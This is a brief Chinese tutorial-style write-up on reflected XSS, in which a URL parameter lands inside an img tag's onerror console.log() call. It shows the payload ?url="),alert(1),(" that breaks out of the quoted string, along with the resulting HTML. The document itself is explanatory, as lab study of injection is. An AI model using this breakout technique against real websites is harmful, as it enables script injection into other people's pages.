关键词
onerror
console.log
一个事件函数执行多个事件脚本
示例
URL
www.example.com/1.php?url=/images/1.pnghtml代码
<img src="/images/1.png" onerror="console.log("/images/1.png";)">难点
认识console.log()函数,该函数的作用是在控制台进行输出
与一般的console.log()中的xss存在区别,主要在与console.log("")内是引号引起来的成为了文本,而不是代码,在控制台会直接输出而不会执行,所以不能通过console.log("")来打xss
思路
利用onerror函数来执行javascript
测试
构造payload
?url="),alert(1),("最终html代码
<img src=""),alert(1),("" onerror="console.log(""),alert(1),("")">前后代码比较
前:<img src="/images/1.png" onerror="console.log("/images/1.png";)">
payload:?url="),alert(1),("
后:<img src=""),alert(1),("" onerror="console.log(""),alert(1),("")">解释
先将console.log函数闭合
将末尾的引号闭合
中间加入需要执行的事件代码alert(1)
使用逗号将三者隔离开
最终整个语句的意思为:图片未能加载出来,故onerror事件函数开始执行,执行了下面3个
console.log("")
alert(1)
("")
扫一扫
178
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
